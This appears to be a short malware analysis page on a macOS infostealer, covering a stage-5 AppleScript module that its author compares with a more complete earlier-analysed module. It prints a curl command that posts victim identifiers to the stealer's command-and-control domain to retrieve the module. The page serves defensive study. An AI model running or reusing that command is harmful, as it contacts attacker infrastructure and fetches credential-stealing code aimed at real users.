← Reports

InfoStealer · Dropper

Essential macOS Stealer - script.sh

Author
Moise Medici
Updated
10 Sept 2026 · Completed
Difficulty
Easy
Platform
MacOS
Capabilities
Command and Control C2 CommunicationCommand Execution via Powershell Cmd BashCredential TheftData-ExfiltrationDropping Secondary Payloads
Tags
bashAppleScriptEssential macOS Stealer

Stage5 lmodule Code Analysis

Looking at the lmodule component selector, the following cURL is used:

Terminal window
curl --max-time 100 --retry 3 --retry-delay 2 -X POST 'https://d9mjs.sbs/' -d 'uuid=AAA1111A-1A11-11AA-A111-0A1A1A11AA11>&username=aldo&txid=7dc957c3cfcbf7bb79ff3b8f0f8288a9&lmoddule' > public/samples/new/stage5_lmodule.applescript

It has a structure very similar to smodule, but with fewer features. The whole file is available in the provided zip. The code appears to be a v1 of the smodule analyzed above. The list of extensions and applications is the same, but it lacks note collection and the chunking of data sent to the server via cURL. Overall, the code is more of a proof of concept than the more polished smodule. The C2 domain and IP remain the same; only the staging directory path changes, becoming /tmp/94a8cb76e4d36ee8c6f0b8a5676c57551788950610.